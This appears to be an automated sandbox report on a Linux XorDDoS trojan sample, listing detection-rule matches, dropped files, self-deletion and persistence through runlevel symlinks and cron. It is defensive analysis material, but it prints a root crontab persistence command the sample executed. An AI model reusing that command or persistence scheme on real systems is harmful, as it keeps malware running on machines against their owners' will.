Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/uzqdvpyngy, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/snluqxjnyb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/snluqxjnyb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/jeyjdycnpv, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/bgoiqqymph, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/dthtwwmqvu, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/21@5/0

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

/run/gcc.pid: pdtdvfdbumvoldufbmfvvwvyzmhpzexq

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc1.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc2.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc3.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc4.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc5.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc.d/rc1.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc.d/rc2.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc.d/rc3.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc.d/rc4.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/rc.d/rc5.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elf	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 6266)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 6267)	File: /etc/crontab	Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6266)

Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

Jump to behavior

Source: /sbin/update-rc.d (PID: 6271)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Reads from proc file: /proc/cpuinfo	Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/oigyzaiygp	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/sosfbbrzmx	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/gphlkawhxw	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/vnihfmehfy	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/eqoogeqyds	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/otlzwyqefc	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/dthtwwmqvu	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/jeyjdycnpv	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/wutujskjnm	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/qxzsiorokf	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/uzqdvpyngy	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/bgoiqqymph	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/uhjkqkcgma	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/ksagqhmoao	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File written: /usr/bin/snluqxjnyb	Jump to dropped file

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

Writes shell script file to disk with an unusual file extension: /etc/init.d/UDMp3dZ7nc.elf

Jump to dropped file

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /etc/init.d/UDMp3dZ7nc.elf	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/oigyzaiygp	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/sosfbbrzmx	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/gphlkawhxw	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/vnihfmehfy	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/eqoogeqyds	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/otlzwyqefc	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/dthtwwmqvu	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/jeyjdycnpv	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/wutujskjnm	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/qxzsiorokf	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/uzqdvpyngy	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/bgoiqqymph	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/uhjkqkcgma	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/ksagqhmoao	Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/snluqxjnyb	Jump to dropped file

Sample deletes itself

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/vzezokfask	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	File: /usr/bin/skjzlhozvl	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6295)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6299)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6304)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6306)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6307)	File: /usr/bin/oigyzaiygp	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6313)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6318)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6321)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6324)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6325)	File: /usr/bin/sosfbbrzmx	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6330)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6337)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6340)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6341)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6342)	File: /usr/bin/gphlkawhxw	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6366)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6371)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6374)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6377)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6378)	File: /usr/bin/vnihfmehfy	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6385)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6389)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6393)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6396)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6397)	File: /usr/bin/eqoogeqyds	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6402)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6407)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6412)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6413)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6414)	File: /usr/bin/otlzwyqefc	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6419)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6424)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6427)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6430)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6431)	File: /usr/bin/dthtwwmqvu	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6437)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6442)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6445)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6448)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6449)	File: /usr/bin/jeyjdycnpv	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6454)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6459)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6462)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6465)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6466)	File: /usr/bin/wutujskjnm	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6473)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6478)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6480)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6484)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6485)	File: /usr/bin/qxzsiorokf	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6490)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6495)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6499)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6501)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6502)	File: /usr/bin/uzqdvpyngy	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6507)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6511)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6515)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6518)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6519)	File: /usr/bin/bgoiqqymph	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6527)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6532)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6535)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6538)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6539)	File: /usr/bin/uhjkqkcgma	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6544)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6550)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6554)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6555)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6556)	File: /usr/bin/ksagqhmoao	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6561)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6566)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6569)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6572)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6573)	File: /usr/bin/snluqxjnyb	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6578)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6582)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6586)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6589)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6590)	File: /usr/bin/rfdcbxuezd	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6595)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6600)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6605)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6606)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6607)	File: /usr/bin/nqjbkvhncc	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6617)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6621)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6623)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6624)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6625)	File: /usr/bin/xzmsvqaqiz	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6635)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6638)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6641)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6642)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6643)	File: /usr/bin/bbdupdfrbl	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6649)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6653)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6659)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6658)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6660)	File: /usr/bin/lqmgtequuz	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6670)	File: /usr/bin/vzezokfask	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6675)	File: /usr/bin/vzezokfask	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6677)	File: /usr/bin/vzezokfask	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6678)	File: /usr/bin/vzezokfask	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6679)	File: /usr/bin/vzezokfask	Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)

Sleeps longer then 60s: 1800.0s

Jump to behavior

Source: /tmp/UDMp3dZ7nc.elf (PID: 6260)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6294)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6297)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6300)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6302)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/oigyzaiygp (PID: 6305)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6312)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6315)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6317)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6320)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/sosfbbrzmx (PID: 6323)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6329)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6332)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6334)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6336)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gphlkawhxw (PID: 6339)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6365)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6368)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6370)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6373)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vnihfmehfy (PID: 6376)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6382)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6387)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6390)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6392)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eqoogeqyds (PID: 6395)	Queries kernel information via 'uname':	Jump to behavior
